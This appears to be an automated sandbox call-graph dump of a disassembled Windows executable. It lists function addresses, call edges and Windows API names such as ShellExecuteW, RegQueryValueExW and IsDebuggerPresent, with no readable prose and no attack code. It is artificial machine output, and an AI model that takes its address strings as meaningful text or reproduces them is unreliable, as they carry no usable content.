API calls 92871->92872 92873 e7be17 92872->92873 92874 e8ee75 48 API calls 92873->92874 92874->92875 92875->92807 92878 eb1f3b __NMSG_WRITE 92876->92878 92877 eb1f79 92877->92817 92883 e7d7f7 92877->92883 92878->92877 92879 eb1ffa 92878->92879 92880 eb1f6f 92878->92880 92879->92877 92895 e8d37a 60 API calls 92879->92895 92880->92877 92894 e8d37a 60 API calls 92880->92894 92884 e8f4ea 48 API calls 92883->92884 92885 e7d818 92884->92885 92886 e8f4ea 48 API calls 92885->92886 92887 e7d826 92886->92887 92888 e769e9 48 API calls ___crtGetEnvironmentStringsW 92887->92888 92888->92814 92890 e7b1a2 ___crtGetEnvironmentStringsW 92889->92890 92891 e7b199 92889->92891 92890->92817 92891->92890 92892 e7bdfa 48 API calls 92891->92892 92892->92890 92893->92816 92894->92880 92895->92879 92896->92831 92897->92842 92898->92848 92899->92861 92900->92853 92901->92737 92902->92733 92903->92733 92904->92747 92905->92740 92906->92753 92907 ee19dd 92912 e74a30 92907->92912 92909 ee19f1 92932 e90f0a 52 API calls __cinit 92909->92932 92911 ee19fb 92913 e74a40 __ftell_nolock 92912->92913 92914 e7d7f7 48 API calls 92913->92914 92915 e74af6 92914->92915 92933 e75374 92915->92933 92917 e74aff 92940 e7363c 92917->92940 92924 e7d7f7 48 API calls 92925 e74b32 92924->92925 92962 e749fb 92925->92962 92927 e74b43 Mailbox 92927->92909 92928 e74b3d _wcscat Mailbox __NMSG_WRITE 92928->92927 92929 e7ce19 48 API calls 92928->92929 92930 e764cf 48 API calls 92928->92930 92931 e761a6 48 API calls 92928->92931 92929->92928 92930->92928 92931->92928 92932->92911 92976 e9f8a0 92933->92976 92936 e7ce19 48 API calls 92937 e753a7 92936->92937 92978 e7660f 92937->92978 92939 e753b1 Mailbox 92939->92917 92941 e73649 __ftell_nolock 92940->92941 93004 e7366c GetFullPathNameW 92941->93004 92943 e7365a 92944 e76a63 48 API calls 92943->92944 92945 e73669 92944->92945 92946 e7518c 92945->92946 92947 e75197 92946->92947 92948 ee1ace 92947->92948 92949 e7519f 92947->92949 92951 e76b4a 48 API calls 92948->92951 93006 e75130 92949->93006 92953 ee1adb __NMSG_WRITE 92951->92953 92952 e74b18 92956 e764cf 92952->92956 92954 e8ee75 48 API calls 92953->92954 92955 ee1b07 ___crtGetEnvironmentStringsW 92954->92955 92957 e7651b 92956->92957 92961 e764dd ___crtGetEnvironmentStringsW 92956->92961 92959 e8f4ea 48 API calls 92957->92959 92958 e8f4ea 48 API calls 92960 e74b29 92958->92960 92959->92961 92960->92924 92961->92958 93016 e7bcce 92962->93016 92965 ee41cc RegQueryValueExW 92967 ee4246 RegCloseKey 92965->92967 92968 ee41e5 92965->92968 92966 e74a2b 92966->92928 92969 e8f4ea 48 API calls 92968->92969 92970 ee41fe 92969->92970 93022 e747b7 92970->93022 92973 ee4224 92974 e76a63 48 API calls 92973->92974 92975 ee423b 92974->92975 92975->92967 92977 e75381 GetModuleFileNameW 92976->92977 92977->92936 92979 e9f8a0 __ftell_nolock 92978->92979 92980 e7661c GetFullPathNameW 92979->92980 92985 e76a63 92980->92985 92982 e76643 92996 e76571 92982->92996 92986 e76adf 92985->92986 92988 e76a6f __NMSG_WRITE 92985->92988 92987 e7b18b 48 API calls 92986->92987 92993 e76ab6 ___crtGetEnvironmentStringsW 92987->92993 92989 e76ad7 92988->92989 92990 e76a8b 92988->92990 93003 e7c369 48 API calls 92989->93003 93000 e76b4a 92990->93000 92993->92982 92994 e76a95 92995 e8ee75 48 API calls 92994->92995 92995->92993 92997 e7657f 92996->92997 92998 e7b18b 48 API calls 92997->92998 92999 e7658f 92998->92999 92999->92939 93001 e8f4ea 48 API calls 93000->93001 93002 e76b54 93001->93002 93002->92994 93003->92993 93005 e7368a 93004->93005 93005->92943 93007 e7513f __NMSG_WRITE 93006->93007 93008 e75151 93007->93008 93009 ee1b27 93007->93009 93010 e7bb85 48 API calls 93008->93010 93011 e76b4a 48 API calls 93009->93011 93012 e7515e ___crtGetEnvironmentStringsW 93010->93012 93013 ee1b34 93011->93013 93012->92952 93014 e8ee75 48 API calls 93013->93014 93015 ee1b57 ___crtGetEnvironmentStringsW 93014->93015 93017 e7bce8 93016->93017 93021 e74a0a RegOpenKeyExW 93016->93021 93018 e8f4ea 48 API calls 93017->93018 93019 e7bcf2 93018->93019 93020 e8ee75 48 API calls 93019->93020 93020->93021 93021->92965 93021->92966 93023 e8f4ea 48 API calls 93022->93023 93024 e747c9 RegQueryValueExW 93023->93024 93024->92973 93024->92975 93025 e95dfd 93026 e95e09 _raise 93025->93026 93062 e97eeb GetStartupInfoW 93026->93062 93029 e95e0e 93064 e99ca7 GetProcessHeap 93029->93064 93030 e95e66 93031 e95e71 93030->93031 93149 e95f4d 47 API calls 3 library calls 93030->93149 93065 e97b47 93031->93065 93034 e95e77 93035 e95e82 __RTC_Initialize 93034->93035 93150 e95f4d 47 API calls 3 library calls 93034->93150 93086 e9acb3 93035->93086 93038 e95e91 93039 e95e9d GetCommandLineW 93038->93039 93151 e95f4d 47 API calls 3 library calls 93038->93151 93105 ea2e7d GetEnvironmentStringsW 93039->93105 93043 e95e9c 93043->93039 93046 e95ec2 93118 ea2cb4 93046->93118 93049 e95ec8 93050 e95ed3 93049->93050 93153 e9115b 47 API calls 3 library calls 93049->93153 93132 e91195 93050->93132 93053 e95edb 93054 e95ee6 __wwincmdln 93053->93054 93154 e9115b 47 API calls 3 library calls 93053->93154 93136 e73a0f 93054->93136 93057 e95efa 93058 e95f09 93057->93058 93155 e913f1 47 API calls _doexit 93057->93155 93156 e91186 47 API calls _doexit 93058->93156 93061 e95f0e _raise 93063 e97f01 93062->93063 93063->93029 93064->93030 93157 e9123a 93065->93157 93067 e97b4c 93160 e97e23 93067->93160 93070 e97b55 93173 e97bbd 50 API calls 2 library calls 93070->93173 93073 e97b5a 93073->93034 93075 e97b72 93167 e96986 93075->93167 93078 e97bb4 93176 e97bbd 50 API calls 2 library calls 93078->93176 93081 e97bb9 93081->93034 93082 e97b93 93082->93078 93083 e97b99 93082->93083 93175 e97a94 47 API calls 4 library calls 93083->93175 93085 e97ba1 GetCurrentThreadId 93085->93034 93087 e9acbf _raise 93086->93087 93185 e97cf4 93087->93185 93089 e9acc6 93090 e96986 __calloc_crt 47 API calls 93089->93090 93091 e9acd7 93090->93091 93092 e9ad42 GetStartupInfoW 93091->93092 93093 e9ace2 _raise @_EH4_CallFilterFunc@8 93091->93093 93100 e9ae80 93092->93100 93102 e9ad57 93092->93102 93093->93038 93094 e9af44 93192 e9af58 LeaveCriticalSection _doexit 93094->93192 93096 e9aec9 GetStdHandle 93096->93100 93097 e96986 __calloc_crt 47 API calls 93097->93102 93098 e9aedb GetFileType 93098->93100 93099 e9ada5 93099->93100 93103 e9ade5 InitializeCriticalSectionAndSpinCount 93099->93103 93104 e9add7 GetFileType 93099->93104 93100->93094 93100->93096 93100->93098 93101 e9af08 InitializeCriticalSectionAndSpinCount 93100->93101 93101->93100 93102->93097 93102->93099 93102->93100 93103->93099 93104->93099 93104->93103 93106 ea2e8e 93105->93106 93107 e95ead 93105->93107 93231 e969d0 47 API calls _W_store_winword 93106->93231 93112 ea2a7b GetModuleFileNameW 93107->93112 93110 ea2eb4 ___crtGetEnvironmentStringsW 93111 ea2eca FreeEnvironmentStringsW 93110->93111 93111->93107 93113 ea2aaf _wparse_cmdline 93112->93113 93114 e95eb7 93113->93114 93115 ea2ae9 93113->93115 93114->93046 93152 e9115b 47 API calls 3 library calls 93114->93152 93232 e969d0 47 API calls _W_store_winword 93115->93232 93117 ea2aef _wparse_cmdline 93117->93114 93119 ea2ccd __NMSG_WRITE 93118->93119 93123 ea2cc5 93118->93123 93120 e96986 __calloc_crt 47 API calls 93119->93120 93128 ea2cf6 __NMSG_WRITE 93120->93128 93121 ea2d4d 93122 e91c9d _free 47 API calls 93121->93122 93122->93123 93123->93049 93124 e96986 __calloc_crt 47 API calls 93124->93128 93125 ea2d72 93126 e91c9d _free 47 API calls 93125->93126 93126->93123 93128->93121 93128->93123 93128->93124 93128->93125 93129 ea2d89 93128->93129 93233 ea2567 47 API calls _raise 93128->93233 93234 e96e20 IsProcessorFeaturePresent 93129->93234 93133 e911a1 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 93132->93133 93134 e911e0 __IsNonwritableInCurrentImage 93133->93134 93257 e90f0a 52 API calls __cinit 93133->93257 93134->93053 93137 ee1ebf 93136->93137 93138 e73a29 93136->93138 93139 e73a63 IsThemeActive 93138->93139 93258 e91405 93139->93258 93143 e73a8f 93270 e73adb SystemParametersInfoW SystemParametersInfoW 93143->93270 93145 e73a9b 93271 e73d19 93145->93271 93147 e73aa3 SystemParametersInfoW 93148 e73ac8 93147->93148 93148->93057 93149->93031 93150->93035 93151->93043 93155->93058 93156->93061 93158 e91243 __init_pointers __initp_misc_winsig 93157->93158 93159 e97f4a 30 API calls 93158->93159 93159->93067 93161 e97e2f 93160->93161 93162 e97e35 InitializeCriticalSectionAndSpinCount 93161->93162 93163 e97b51 93161->93163 93162->93161 93163->93070 93164 e97e6d 93163->93164 93165 e97b67 93164->93165 93166 e97e84 TlsAlloc 93164->93166 93165->93070 93165->93075 93170 e9698d 93167->93170 93169 e969ca 93169->93078 93174 e97ec9 TlsSetValue 93169->93174 93170->93169 93171 e969ab Sleep 93170->93171 93177 ea30aa 93170->93177 93172 e969c2 93171->93172 93172->93169 93172->93170 93173->93073 93174->93082 93175->93085 93176->93081 93178 ea30b5 93177->93178 93182 ea30d0 __calloc_impl 93177->93182 93179 ea30c1 93178->93179 93178->93182 93184 e97c0e 47 API calls __getptd_noexit 93179->93184 93181 ea30e0 RtlAllocateHeap 93181->93182 93183 ea30c6 93181->93183 93182->93181 93182->93183 93183->93170 93184->93183 93186 e97d18 EnterCriticalSection 93185->93186 93187 e97d05 93185->93187 93186->93089 93193 e97d7c 93187->93193 93189 e97d0b 93189->93186 93217 e9115b 47 API calls 3 library calls 93189->93217 93192->93093 93194 e97d88 _raise 93193->93194 93195 e97da9 93194->93195 93196 e97d91 93194->93196 93198 e97da7 93195->93198 93203 e97e11 _raise 93195->93203 93218 e981c2 47 API calls __NMSG_WRITE 93196->93218 93198->93195 93221 e969d0 47 API calls _W_store_winword 93198->93221 93199 e97d96 93219 e9821f 47 API calls 5 library calls 93199->93219 93201 e97dbd 93204 e97dd3 93201->93204 93205 e97dc4 93201->93205 93203->93189 93208 e97cf4 __lock 46 API calls 93204->93208 93222 e97c0e 47 API calls __getptd_noexit 93205->93222 93206 e97d9d 93220 e91145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 93206->93220 93211 e97dda 93208->93211 93210 e97dc9 93210->93203 93212 e97de9 InitializeCriticalSectionAndSpinCount 93211->93212 93213 e97dfe 93211->93213 93214 e97e04 93212->93214 93223 e91c9d 93213->93223 93229 e97e1a LeaveCriticalSection _doexit 93214->93229 93218->93199 93219->93206 93221->93201 93222->93210 93224 e91ccf __dosmaperr 93223->93224 93225 e91ca6 RtlFreeHeap 93223->93225 93224->93214 93225->93224 93226 e91cbb 93225->93226 93230 e97c0e 47 API calls __getptd_noexit 93226->93230 93228 e91cc1 GetLastError 93228->93224 93229->93203 93230->93228 93231->93110 93232->93117 93233->93128 93235 e96e2b 93234->93235 93240 e96cb5 93235->93240 93239 e96e46 93239->93049 93241 e96ccf _memset ___raise_securityfailure 93240->93241 93242 e96cef IsDebuggerPresent 93241->93242 93248 e981ac SetUnhandledExceptionFilter UnhandledExceptionFilter 93242->93248 93245 e96db3 ___raise_securityfailure 93249 e9a70c 93245->93249 93246 e96dd6 93247 e98197 GetCurrentProcess TerminateProcess 93246->93247 93247->93239 93248->93245 93250 e9a714 93249->93250 93251 e9a716 IsProcessorFeaturePresent 93249->93251 93250->93246 93253 ea37b0 93251->93253 93256 ea375f 5 API calls ___raise_securityfailure 93253->93256 93255 ea3893 93255->93246 93256->93255 93257->93134 93259 e97cf4 __lock 47 API calls 93258->93259 93260 e91410 93259->93260 93323 e97e58 LeaveCriticalSection 93260->93323 93262 e73a88 93263 e9146d 93262->93263 93264 e91491 93263->93264 93265 e91477 93263->93265 93264->93143 93265->93264 93324 e97c0e 47 API calls __getptd_noexit 93265->93324 93267 e91481 93325 e96e10 8 API calls _raise 93267->93325 93269 e9148c 93269->93143 93270->93145 93272 e73d26 __ftell_nolock 93271->93272 93273 e7d7f7 48 API calls 93272->93273 93274 e73d31 GetCurrentDirectoryW 93273->93274 93326 e761ca 93274->93326 93276 e73d57 IsDebuggerPresent 93277 ee1cc1 MessageBoxA 93276->93277 93278 e73d65 93276->93278 93279 ee1cd9 93277->93279 93278->93279 93280 e73d82 93278->93280 93310 e73e3a 93278->93310 93512 e8c682 48 API calls 93279->93512 93400 e740e5 93280->93400 93281 e73e41 SetCurrentDirectoryW 93284 e73e4e Mailbox 93281->93284 93284->93147 93285 ee1ce9 93290 ee1cff SetCurrentDirectoryW 93285->93290 93287 e73da0 GetFullPathNameW 93288 e76a63 48 API calls 93287->93288 93289 e73ddb 93288->93289 93416 e76430 93289->93416 93290->93284 93293 e73df6 93294 e73e00 93293->93294 93513 eb71fa AllocateAndInitializeSid CheckTokenMembership FreeSid 93293->93513 93432 e73e6e GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 93294->93432 93297 ee1d1c 93297->93294 93300 ee1d2d 93297->93300 93303 e75374 50 API calls 93300->93303 93301 e73e0a 93302 e73e1f 93301->93302 93440 e74ffc 93301->93440 93450 e7e8d0 93302->93450 93306 ee1d35 93303->93306 93308 e7ce19 48 API calls 93306->93308 93309 ee1d42 93308->93309 93311 ee1d6e 93309->93311 93312 ee1d49 93309->93312 93310->93281 93315 e7518c 48 API calls 93311->93315 93314 e7518c 48 API calls 93312->93314 93316 ee1d54 93314->93316 93317 ee1d6a GetForegroundWindow ShellExecuteW 93315->93317 93514 e7510d 93316->93514 93321 ee1d9e Mailbox 93317->93321 93321->93310 93322 e7518c 48 API calls 93322->93317 93323->93262 93324->93267 93325->93269 93523 e8e99b 93326->93523 93330 e761eb 93331 e75374 50 API calls 93330->93331 93332 e761ff 93331->93332 93333 e7ce19 48 API calls 93332->93333 93334 e7620c 93333->93334 93540 e739db 93334->93540 93336 e76216 Mailbox 93337 e76eed 48 API calls 93336->93337 93338 e7622b 93337->93338 93552 e79048 93338->93552 93341 e7ce19 48 API calls 93342 e76244 93341->93342 93555 e7d6e9 93342->93555 93344 e76254 Mailbox 93345 e7ce19 48 API calls 93344->93345 93346 e7627c 93345->93346 93347 e7d6e9 55 API calls 93346->93347 93348 e7628f Mailbox 93347->93348 93349 e7ce19 48 API calls 93348->93349 93350 e762a0 93349->93350 93559 e7d645 93350->93559 93352 e762b2 Mailbox 93353 e7d7f7 48 API calls 93352->93353 93354 e762c5 93353->93354 93569 e763fc 93354->93569 93358 e762df 93359 ee1c08 93358->93359 93360 e762e9 93358->93360 93361 e763fc 48 API calls 93359->93361 93362 e90fa7 _W_store_winword 59 API calls 93360->93362 93364 ee1c1c 93361->93364 93363 e762f4 93362->93363 93363->93364 93365 e762fe 93363->93365 93367 e763fc 48 API calls 93364->93367 93366 e90fa7 _W_store_winword 59 API calls 93365->93366 93368 e76309 93366->93368 93369 ee1c38 93367->93369 93368->93369 93370 e76313 93368->93370 93372 e75374 50 API calls 93369->93372 93371 e90fa7 _W_store_winword 59 API calls 93370->93371 93374 e7631e 93371->93374 93373 ee1c5d 93372->93373 93375 e763fc 48 API calls 93373->93375 93376 e7635f 93374->93376 93380 e763fc 48 API calls 93374->93380 93391 ee1c86 93374->93391 93377 ee1c69 93375->93377 93378 e7636c 93376->93378 93376->93391 93379 e76eed 48 API calls 93377->93379 93382 e8c050 48 API calls 93378->93382 93383 ee1c77 93379->93383 93384 e76342 93380->93384 93381 e76eed 48 API calls 93385 ee1ca8 93381->93385 93386 e76384 93382->93386 93387 e763fc 48 API calls 93383->93387 93388 e76eed 48 API calls 93384->93388 93389 e763fc 48 API calls 93385->93389 93390 e81b90 48 API calls 93386->93390 93387->93391 93392 e76350 93388->93392 93393 ee1cb5 93389->93393 93397 e76394 93390->93397 93391->93381 93394 e763fc 48 API calls 93392->93394 93393->93393 93394->93376 93395 e81b90 48 API calls 93395->93397 93397->93395 93398 e763fc 48 API calls 93397->93398 93399 e763d6 Mailbox 93397->93399 93585 e76b68 48 API calls 93397->93585 93398->93397 93399->93276 93401 e740f2 __ftell_nolock 93400->93401 93402 ee370e _memset 93401->93402 93403 e7410b 93401->93403 93406 ee372a GetOpenFileNameW 93402->93406 93404 e7660f 49 API calls 93403->93404 93405 e74114 93404->93405 94109 e740a7 93405->94109 93408 ee3779 93406->93408 93410 e76a63 48 API calls 93408->93410 93412 ee378e 93410->93412 93412->93412 93413 e74129 94127 e74139 93413->94127 93417 e7643d __ftell_nolock 93416->93417 94327 e74c75 93417->94327 93419 e76442 93420 e73dee 93419->93420 94338 e75928 86 API calls 93419->94338 93420->93285 93420->93293 93422 e7644f 93422->93420 94339 e75798 88 API calls Mailbox 93422->94339 93424 e76458 93424->93420 93425 e7645c GetFullPathNameW 93424->93425 93426 e76a63 48 API calls 93425->93426 93427 e76488 93426->93427 93428 e76a63 48 API calls 93427->93428 93429 e76495 93428->93429 93430 ee5dcf _wcscat 93429->93430 93431 e76a63 48 API calls 93429->93431 93431->93420 93433 ee1cba 93432->93433 93434 e73ed8 93432->93434 94385 e74024 93434->94385 93438 e73e05 93439 e736b8 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 93438->93439 93439->93301 93441 e75027 _memset 93440->93441 94390 e74c30 93441->94390 93444 e750ac 93446 ee3d28 Shell_NotifyIconW 93444->93446 93447 e750ca Shell_NotifyIconW 93444->93447 94394 e751af 93447->94394 93449 e750df 93449->93302 93451 e7e8f6 93450->93451 93510 e7e906 Mailbox 93450->93510 93453 e7ed52 93451->93453 93451->93510 93452 ebcc5c 86 API calls 93452->93510 94575 e8e3cd 335 API calls 93453->94575 93454 e7ebc7 93456 e73e2a 93454->93456 94576 e72ff6 16 API calls 93454->94576 93456->93310 93511 e73847 Shell_NotifyIconW _memset 93456->93511 93458 e7ed63 93458->93456 93459 e7ed70 93458->93459 94577 e8e312 335 API calls Mailbox 93459->94577 93460 e7e94c PeekMessageW 93460->93510 93462 ee526e Sleep 93462->93510 93463 e7ed77 LockWindowUpdate DestroyWindow GetMessageW 93463->93456 93465 e7eda9 93463->93465 93466 ee59ef TranslateMessage DispatchMessageW GetMessageW 93465->93466 93466->93466 93468 ee5a1f 93466->93468 93468->93456 93469 e7ed21 PeekMessageW 93469->93510 93470 e7ebf7 timeGetTime 93470->93510 93472 e76eed 48 API calls 93472->93510 93473 ee5557 WaitForSingleObject 93477 ee5574 GetExitCodeProcess CloseHandle 93473->93477 93473->93510 93474 e8f4ea 48 API calls 93474->93510 93475 e7ed3a TranslateMessage DispatchMessageW 93475->93469 93476 ee588f Sleep 93506 ee5429 Mailbox 93476->93506 93477->93510 93478 e7d7f7 48 API calls 93478->93506 93479 e7edae timeGetTime 94578 e71caa 49 API calls 93479->94578 93480 ee5733 Sleep 93480->93506 93484 ee5926 GetExitCodeProcess 93488 ee593c WaitForSingleObject 93484->93488 93489 ee5952 CloseHandle 93484->93489 93486 e72aae 311 API calls 93486->93510 93487 e8dc38 timeGetTime 93487->93506 93488->93489 93488->93510 93489->93506 93490 ee5445 Sleep 93490->93510 93492 ee5432 Sleep 93492->93490 93493 ed8c4b 108 API calls 93493->93506 93494 e72c79 107 API calls 93494->93506 93495 ee59ae Sleep 93495->93510 93496 e71caa 49 API calls 93496->93510 93497 e7ce19 48 API calls 93497->93506 93501 e7d6e9 55 API calls 93501->93506 93502 e7fe30 311 API calls 93502->93510 93506->93478 93506->93484 93506->93487 93506->93490 93506->93492 93506->93493 93506->93494 93506->93495 93506->93497 93506->93501 93506->93510 94580 eb4cbe 49 API calls Mailbox 93506->94580 94581 e71caa 49 API calls 93506->94581 94582 e72aae 335 API calls 93506->94582 94583 ecccb2 50 API calls 93506->94583 94584 eb7a58 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 93506->94584 94585 eb6532 63 API calls 3 library calls 93506->94585 93508 e7ce19 48 API calls 93508->93510 93509 e7d6e9 55 API calls 93509->93510 93510->93452 93510->93454 93510->93460 93510->93462 93510->93469 93510->93470 93510->93472 93510->93473 93510->93474 93510->93475 93510->93476 93510->93479 93510->93480 93510->93486 93510->93490 93510->93496 93510->93502 93510->93506 93510->93508 93510->93509 94417 e7f110 93510->94417 94482 e845e0 93510->94482 94499 e83200 93510->94499 94571 e7eed0 335 API calls Mailbox 93510->94571 94572 e7ef00 335 API calls 93510->94572 94573 e8e244 TranslateAcceleratorW 93510->94573 94574 e8dc5f IsDialogMessageW GetClassLongW 93510->94574 94579 ed8d23 48 API calls 93510->94579 93511->93310 93512->93285 93513->93297 93515 e7511f 93514->93515 93516 ee1be7 93514->93516 93517 e7b384 48 API calls 93515->93517 94823 eaa58f 48 API calls ___crtGetEnvironmentStringsW 93516->94823 93519 e7512b 93517->93519 93519->93322 93520 ee1bf1 93521 e76eed 48 API calls 93520->93521 93522 ee1bf9 Mailbox 93521->93522 93524 e7d7f7 48 API calls 93523->93524 93525 e761db 93524->93525 93526 e76009 93525->93526 93527 e76016 __ftell_nolock 93526->93527 93528 e76a63 48 API calls 93527->93528 93534 e7617c Mailbox 93527->93534 93530 e76048 93528->93530 93539 e7607e Mailbox 93530->93539 93586 e761a6 93530->93586 93531 e761a6 48 API calls 93531->93539 93532 e7614f 93533 e7ce19 48 API calls 93532->93533 93532->93534 93536 e76170 93533->93536 93534->93330 93535 e7ce19 48 API calls 93535->93539 93537 e764cf 48 API calls 93536->93537 93537->93534 93538 e764cf 48 API calls 93538->93539 93539->93531 93539->93532 93539->93534 93539->93535 93539->93538 93589 e741a9 93540->93589 93543 e73a06 93543->93336 93546 ee2ff0 93548 e91c9d _free 47 API calls 93546->93548 93549 ee2ffd 93548->93549 93550 e74252 84 API calls 93549->93550 93551 ee3006 93550->93551 93551->93551 93553 e8f4ea 48 API calls 93552->93553 93554 e76237 93553->93554 93554->93341 93556 e7d6f4 93555->93556 93557 e7d71b 93556->93557 94102 e7d764 55 API calls 93556->94102 93557->93344 93560 e7d654 93559->93560 93568 e7d67e 93559->93568 93561 e7d65b 93560->93561 93564 e7d6c2 93560->93564 93562 e7d6ab 93561->93562 93563 e7d666 93561->93563 93562->93568 94104 e8dce0 53 API calls 93562->94104 94103 e7d9a0 53 API calls __cinit 93563->94103 93564->93562 94105 e8dce0 53 API calls 93564->94105 93568->93352 93570 e76406 93569->93570 93571 e7641f 93569->93571 93572 e76eed 48 API calls 93570->93572 93573 e76a63 48 API calls 93571->93573 93574 e762d1 93572->93574 93573->93574 93575 e90fa7 93574->93575 93576 e91028 93575->93576 93577 e90fb3 93575->93577 94108 e9103a 59 API calls 3 library calls 93576->94108 93584 e90fd8 93577->93584 94106 e97c0e 47 API calls __getptd_noexit 93577->94106 93580 e91035 93580->93358 93581 e90fbf 94107 e96e10 8 API calls _raise 93581->94107 93583 e90fca 93583->93358 93584->93358 93585->93397 93587 e7bdfa 48 API calls 93586->93587 93588 e761b1 93587->93588 93588->93530 93654 e74214 93589->93654 93594 e741d4 LoadLibraryExW 93664 e74291 93594->93664 93595 ee4f73 93596 e74252 84 API calls 93595->93596 93598 ee4f7a 93596->93598 93600 e74291 3 API calls 93598->93600 93602 ee4f82 93600->93602 93690 e744ed 93602->93690 93603 e741fb 93603->93602 93604 e74207 93603->93604 93605 e74252 84 API calls 93604->93605 93607 e739fe 93605->93607 93607->93543 93613 ebc396 93607->93613 93610 ee4fa9 93698 e74950 93610->93698 93614 e74517 83 API calls 93613->93614 93615 ebc405 93614->93615 93876 ebc56d 93615->93876 93618 e744ed 64 API calls 93619 ebc432 93618->93619 93620 e744ed 64 API calls 93619->93620 93621 ebc442 93620->93621 93622 e744ed 64 API calls 93621->93622 93623 ebc45d 93622->93623 93624 e744ed 64 API calls 93623->93624 93625 ebc478 93624->93625 93626 e74517 83 API calls 93625->93626 93627 ebc48f 93626->93627 93628 e9395c _W_store_winword 47 API calls 93627->93628 93629 ebc496 93628->93629 93630 e9395c _W_store_winword 47 API calls 93629->93630 93631 ebc4a0 93630->93631 93632 e744ed 64 API calls 93631->93632 93633 ebc4b4 93632->93633 93634 ebbf5a GetSystemTimeAsFileTime 93633->93634 93635 ebc4c7 93634->93635 93636 ebc4dc 93635->93636 93637 ebc4f1 93635->93637 93638 e91c9d _free 47 API calls 93636->93638 93639 ebc4f7 93637->93639 93640 ebc556 93637->93640 93643 ebc4e2 93638->93643 93882 ebb965 118 API calls __fcloseall 93639->93882 93642 e91c9d _free 47 API calls 93640->93642 93647 ebc41b 93642->93647 93645 e91c9d _free 47 API calls 93643->93645 93644 ebc54e 93646 e91c9d _free 47 API calls 93644->93646 93645->93647 93646->93647 93647->93546 93648 e74252 93647->93648 93649 e7425c 93648->93649 93653 e74263 93648->93653 93883 e935e4 93649->93883 93651 e74283 FreeLibrary 93652 e74272 93651->93652 93652->93546 93653->93651 93653->93652 93703 e74339 93654->93703 93657 e7423c 93659 e74244 FreeLibrary 93657->93659 93660 e741bb 93657->93660 93659->93660 93661 e93499 93660->93661 93711 e934ae 93661->93711 93663 e741c8 93663->93594 93663->93595 93790 e742e4 93664->93790 93667 e742b8 93668 e742c1 FreeLibrary 93667->93668 93669 e741ec 93667->93669 93668->93669 93671 e74380 93669->93671 93672 e8f4ea 48 API calls 93671->93672 93673 e74395 93672->93673 93674 e747b7 48 API calls 93673->93674 93675 e743a1 ___crtGetEnvironmentStringsW 93674->93675 93676 e743dc 93675->93676 93677 e744d1 93675->93677 93678 e74499 93675->93678 93679 e74950 57 API calls 93676->93679 93809 ebc750 93 API calls 93677->93809 93798 e7406b CreateStreamOnHGlobal 93678->93798 93682 e743e5 93679->93682 93683 e744ed 64 API calls 93682->93683 93684 e74479 93682->93684 93686 ee4ed7 93682->93686 93804 e74517 93682->93804 93683->93682 93684->93603 93687 e74517 83 API calls 93686->93687 93688 ee4eeb 93687->93688 93689 e744ed 64 API calls 93688->93689 93689->93684 93691 e744ff 93690->93691 93692 ee4fc0 93690->93692 93833 e9381e 93691->93833 93695 ebbf5a 93853 ebbdb4 93695->93853 93697 ebbf70 93697->93610 93699 e7495f 93698->93699 93700 ee5002 93698->93700 93858 e93e65 93699->93858 93702 e74967 93707 e7434b 93703->93707 93706 e74321 LoadLibraryA GetProcAddress 93706->93657 93708 e7422f 93707->93708 93709 e74354 LoadLibraryA 93707->93709 93708->93657 93708->93706 93709->93708 93710 e74365 GetProcAddress 93709->93710 93710->93708 93713 e934ba _raise 93711->93713 93712 e934cd 93759 e97c0e 47 API calls __getptd_noexit 93712->93759 93713->93712 93716 e934fe 93713->93716 93715 e934d2 93760 e96e10 8 API calls _raise 93715->93760 93730 e9e4c8 93716->93730 93719 e93503 93720 e93519 93719->93720 93721 e9350c 93719->93721 93722 e93543 93720->93722 93723 e93523 93720->93723 93761 e97c0e 47 API calls __getptd_noexit 93721->93761 93744 e9e5e0 93722->93744 93762 e97c0e 47 API calls __getptd_noexit 93723->93762 93727 e934dd _raise @_EH4_CallFilterFunc@8 93727->93663 93731 e9e4d4 _raise 93730->93731 93732 e97cf4 __lock 47 API calls 93731->93732 93742 e9e4e2 93732->93742 93733 e9e559 93769 e969d0 47 API calls _W_store_winword 93733->93769 93734 e9e552 93764 e9e5d7 93734->93764 93737 e9e5cc _raise 93737->93719 93738 e9e560 93738->93734 93739 e9e56f InitializeCriticalSectionAndSpinCount EnterCriticalSection 93738->93739 93739->93734 93740 e97d7c __mtinitlocknum 47 API calls 93740->93742 93742->93733 93742->93734 93742->93740 93767 e94e5b 48 API calls __lock 93742->93767 93768 e94ec5 LeaveCriticalSection LeaveCriticalSection _doexit 93742->93768 93753 e9e600 __wopenfile 93744->93753 93745 e9e61a 93774 e97c0e 47 API calls __getptd_noexit 93745->93774 93747 e9e7d5 93747->93745 93751 e9e838 93747->93751 93748 e9e61f 93775 e96e10 8 API calls _raise 93748->93775 93750 e9354e 93763 e93570 LeaveCriticalSection LeaveCriticalSection _fseek 93750->93763 93771 ea63c9 93751->93771 93753->93745 93753->93747 93753->93753 93776 e9185b 59 API calls 2 library calls 93753->93776 93755 e9e7ce 93755->93747 93777 e9185b 59 API calls 2 library calls 93755->93777 93757 e9e7ed 93757->93747 93778 e9185b 59 API calls 2 library calls 93757->93778 93759->93715 93760->93727 93761->93727 93762->93727 93763->93727 93770 e97e58 LeaveCriticalSection 93764->93770 93766 e9e5de 93766->93737 93767->93742 93768->93742 93769->93738 93770->93766 93779 ea5bb1 93771->93779 93773 ea63e2 93773->93750 93774->93748 93775->93750 93776->93755 93777->93757 93778->93747 93782 ea5bbd _raise 93779->93782 93780 ea5bcf 93781 e97c0e _raise 47 API calls 93780->93781 93783 ea5bd4 93781->93783 93782->93780 93784 ea5c06 93782->93784 93785 e96e10 _raise 8 API calls 93783->93785 93786 ea5c78 __wsopen_helper 110 API calls 93784->93786 93789 ea5bde _raise 93785->93789 93787 ea5c23 93786->93787 93788 ea5c4c __wsopen_helper LeaveCriticalSection 93787->93788 93788->93789 93789->93773 93794 e742f6 93790->93794 93793 e742cc LoadLibraryA GetProcAddress 93793->93667 93795 e742aa 93794->93795 93796 e742ff LoadLibraryA 93794->93796 93795->93667 93795->93793 93796->93795 93797 e74310 GetProcAddress 93796->93797 93797->93795 93799 e74085 FindResourceExW 93798->93799 93800 e740a2 93798->93800 93799->93800 93801 ee4f16 LoadResource 93799->93801 93800->93676 93801->93800 93802 ee4f2b SizeofResource 93801->93802 